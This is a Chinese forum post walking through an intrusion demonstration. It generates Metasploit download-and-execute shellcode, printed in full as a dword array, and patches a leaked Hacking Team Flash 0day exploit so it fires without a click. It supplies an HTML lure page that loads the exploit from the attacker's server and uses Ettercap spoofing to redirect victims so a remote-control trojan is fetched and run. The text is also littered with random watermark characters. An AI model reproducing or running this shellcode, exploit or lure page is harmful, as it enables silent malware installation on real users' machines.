flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

& z" ?" Y+ ?8 X- J 三、flash 0day之手工代码修改制作下载者实例入侵演示 , K0 Z8 w# j# o% A5 z" d n

$ U5 j+ S0 |; Z( P8 I6 y3 S+ | 利用到的工具： ( N8 I; a. |$ o! I" h' @

2 v% K% g, [0 H2 e. @. y" Y Msf / }1 O0 j% ~- D6 |7 z- u

$ o& ]* l# i M# z( z Ettercap - U. K# P7 ~" ~4 Y! {

a- X/ b$ B4 E( A Adobe Flash CS6 ( _9 ]& y4 e: D* R8 `& k) ]

0 x- a( e% {8 K: T y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 7 _4 L5 K" m% Y, k1 o" K7 F

5 [1 c6 j u" j. g' \+ h) x- t 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options `9 [: I" X, L! T

% G2 c+ _) l# O5 d# o; C 如图： 9 p! g8 Z" ]2 h

, w }2 c% i: A o4 m5 J 7 B% q) \2 h2 ?5 K- \5 V

3 [7 _/ k* R( p/ g( k6 Q, p7 A ' K% B1 d% r& H/ M& F8 r: b2 z: r

% h/ g3 |( b5 s5 ^ s) o 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: 8 F7 n) L8 T% j1 ~

# }. }. F* \% R% i- L3 j) v2 M: R % \4 F: [6 ]0 p% J! ^) k! v

" L F4 E+ u% u 3 y( z8 ]7 s( Y

3 N' O, k* K0 x7 W9 l 然后执行generate -t dword生成shellcode，如下： ) b9 V8 }/ |5 p, T+ _2 P) i' q3 K; ]

3 U4 ` ~$ n: q# S6 f* @ 5 O1 j# h- m! B# r: P3 Q1 {

4 K, B! y' Z2 w1 f' R 复制代码到文本下便于我们一会编辑flash exp，如下： 2 G/ F# m5 y) n2 o( j

6 E# T0 @+ I! i; U+ F+ | 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ( p! x" {+ @% Z' x9 E9 ~

K+ \5 G4 v1 |4 Q: ^6 m 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ' P( w! ^8 y$ j4 s

, g8 ]* i0 [) a+ j8 ^8 ~; z/ ^6 m 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ' \' e. e: p* v

+ J8 T2 l3 Y' U" y+ _5 \2 o+ v3 R) T 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, + `; R/ \/ J# f( E

! y4 t! ]( s! W5 M4 V- Z 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 3 h7 C. k* H& Z$ @& C4 o4 ~

, o1 o* _3 _7 \( B$ ^5 Y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 9 b' d8 t0 h* [4 D$ N0 G

: E+ w* `' F# [' r( z3 q 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, & O1 O/ l Q+ _$ S

! t1 q U7 B* }4 D% w 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, $ R0 ]" g {/ B! ~' u

7 M) W( r* R6 V3 ] 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, # x( e7 h* n S! C

3 `) S, C# ^5 B5 @2 W; Q2 H 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, , j) K) M- ^- t% Q4 _" i2 O+ T0 \

! B a* J' K1 d 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, " k( c+ j; K' p E& T! z8 Y: o, C0 L

$ j0 _: }2 h. @" K( p# x 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, % M5 H8 t8 `+ Y2 L

+ u# a( ]; o1 w; V3 Q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 4 T1 R% `: Y- @* U- Y: b

3 o/ I$ [& T% v. O# v 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 0 h( A* Q+ K% q& e0 s f( i

( L; ~( j$ ]3 K 5 H& x# D+ ~" P/ ~( e0 X# v

$ G5 {. F! u2 G9 g . v. r. D3 u1 L H4 o! a5 k

& {# N0 y7 a4 K, f: c$ S 下面我们来修改flash 0day exp，需要修改三个文件，分别为： 1 O' A( i1 k( S( Z

8 r9 ~: c N3 ]9 \1 @- N $ w# n5 z) p" ~/ N

' X' B% O% g$ q- e4 k 先修改ShellWin32.as，部分源代码如图： ?# R- k& k( _1 g( |) Q& S8 ]

0 H/ ]% n D. G' h4 h \ - c. M, ]1 c! F

) K* I+ }; L" e8 c+ C3 K 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： 1 j) o: w( ^9 i( y

$ ^ g' _; ~4 C/ \5 G 5 M& Q( ~* T* F

3 g4 M7 {) U+ q0 w6 \/ K 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： ; U" p# z n" j1 B7 a1 O+ ^5 g

! X( E9 `, r7 C2 M# ` # _3 M9 w2 X8 }/ A ?

" z, X" Z/ A% Y4 o5 {6 D! T 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： 3 {0 U8 m9 o0 e% p& M$ N

( W7 N+ D$ }4 M& }5 g2 L 3 k6 O, o9 H. E! @; P

7 L$ M3 X L# S! L! @ % w' Y- o1 k' f7 T/ H7 T3 [

4 t8 u$ I- A+ i1 K% t) t ; B4 w1 c4 u$ s' N& p

( o: }2 T6 S, c' b 然后点保存，下面我们来编译一下，打开 # A1 m/ z4 ~9 M* ]& S. N

4 k- ` U! ~4 ]& w( c% K1 ^ exp1.fla然后点文件-发布，看看编译没错误 " J, `7 g6 W6 N0 [# J% s

# x2 x3 J8 ]9 C. Y ; r. L9 h- U* \6 B" b# C2 I

4 z+ |5 _& Y6 m0 M0 E1 r 1 C: o9 ?& m% S: @

2 ]9 |8 G7 ~3 F+ G+ K 8 G% V# e3 ]$ `6 z, O. s: w

3 A3 J& B0 U: B- U / d% h! ^# ~4 t8 I3 f- U

6 r# u. O8 v( i2 L 然后我们把生成的 / h7 y+ |# z) y4 Q+ ]' T

& x: K- p* T# W7 d i- d* b, g exp1.swf丢到kailinux 的/var/www/html下： $ _/ R& G* l8 ?* ?) D# \# ?7 V

, }& `( ~& n0 U' x8 ` 然后把这段代码好好编辑一下 2 c6 b# i; o/ @' H& y, ?

, ]( N* e, b% ^4 ?$ z/ e* I ) W; ]8 X0 q1 s

- q0 t- R( O+ o) ~3 y " |7 Z9 S8 V8 V4 Y$ j6 f

3 k! R( u- N( N, p " C- n8 b4 s- J& `6 N n' d' w

k% _! V/ h+ h6 V+ U $ L+ Q1 r. @4 E

. k& b' _ q" H5 l$ b' ?, j + P' d* N8 \- ?# g9 G

5 {7 U1 z6 E" E! F; J2 w" ] 7 Z# @5 k6 M9 W+ b9 F

2 f9 B$ b4 X! e z& J <!DOCTYPE html> + `2 m! z" O+ w A' v2 r* p) @. y5 U" k) z

! Q R& K( y$ a; e3 D <html> ; \& `. [5 j$ _4 x. ]

0 W$ d6 W/ K% j! w <head> 0 M9 J5 L1 \+ j$ ?4 T" R# \

! B! j) ~# }2 K0 b3 A; A <meta http-equiv="Content-Type" content="text/html; . R" {! |: a6 u7 k1 H& {( Y

# j" X* u* `7 v- k; m% A charset=utf-8"/> 3 k7 p9 k+ f" c* Z. q" c/ i

% K p/ i5 y, a/ l9 f </head> 2 }& m1 I0 ~9 Y6 l# X* {

3 |6 L5 _( c% `3 E# Y! p <body> $ I" Z; }5 s* x0 v1 e

, g7 u; D% ^$ c5 w( e$ f7 ~ W <h2> Please wait, the requested page is loading...</h2> . [" K3 L& b; s& C) f( A. f

( y1 {: `9 J3 m8 @ <br> , B# M! e; F5 H1 L/ Q( @- }" S, Y- D

" U( F7 y0 v6 Z9 M' p2 m3 U v" \$ A/ o <OBJECT ! K6 S* ^. D* U; M( \% |

1 L3 J4 z" u. _ classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie - A( O8 Q9 `- p6 z0 D' Q$ u

6 i0 {6 t3 \. [) V. o I VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 3 c7 f; _3 l7 l1 U5 h

. v- S- P6 k) o i% [ </body> 8 s+ {. [& L) |& J

- u @' ]0 a4 A6 S <script> ( \8 ^3 {9 `. u# N% h, s; p. m

& w, H8 {( W% x& S8 O8 q setTimeout(function () { ; g* d9 K% L) O" a, r

* K k) U# }5 j# e6 z! O4 i 8 r- t( m4 g) Y$ S# ~' `1 X3 Z

( Q' E7 v) L0 _/ {% _1 @ window.location.reload(); % R- l" Q4 s0 Q) N$ p( y0 D3 e

7 K$ W1 k0 a' g! \1 y, ], a }, 10000); + T+ E, [. }( d& H

/ ?8 D7 b3 j+ R) E + I+ c3 m1 v5 l: G

9 f; W2 p2 F4 q2 j </script> : {+ n0 |3 j4 ^9 M5 j% ^7 T

. ^: I& o/ z* J* d/ X </html> + c! m, c5 @- z2 y6 w

- {9 D% u+ |3 e5 ?8 G/ t + {" ~6 d4 q6 X$ m! S

- F; `2 r6 [# a7 ]7 G1 C 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： # Z9 S5 Z$ L# E' ]$ `* d

1 B# u" V- m! Y * L4 z+ K0 L0 X. Z; L

c& }6 }/ E0 M7 G% X1 y$ ~ # p6 P' g3 A& f) a" B

8 K* S# I7 m5 R- k7 o4 _+ Y$ Q : n6 j' q- k4 K# D; j$ }0 f* |

& [7 ]- f4 D/ ~8 K6 s2 g: T 2 M# M$ r' \7 X }7 [2 [

# N( X0 v) @9 d2 Y 6 Q+ N1 F3 w2 L

0 B7 ?+ }+ U8 N: A+ ~ 下面我们用ettercap欺骗如图： # d& C: ?2 n% E$ }1 P& R

0 J$ J3 T, T& ~: s9 J 0 K9 Q' x. x/ }8 C( d/ l y

6 o q5 D: E" [0 a2 `9 v % k0 M; q1 ~2 q1 O! X) c

2 g( `+ C: |# k* k 下面我们随便访问个网站看看： / f0 Z4 _ k: W9 ]" D

8 L* @% d6 _6 Q: P' F; v 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： # a* n! ^; [" r+ @2 v `, Z

9 F: x. A% Z3 R f4 a + {7 E+ S# a" K& @! r; Z q

) J- a/ K6 I) j% M7 Y( g* k 我们看另一台， . `# r6 `6 _9 n/ f- \

4 D; @- }: h7 e 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 7 l: g' ?7 j6 p* G4 U

		自动登录	找回密码
密码			立即注册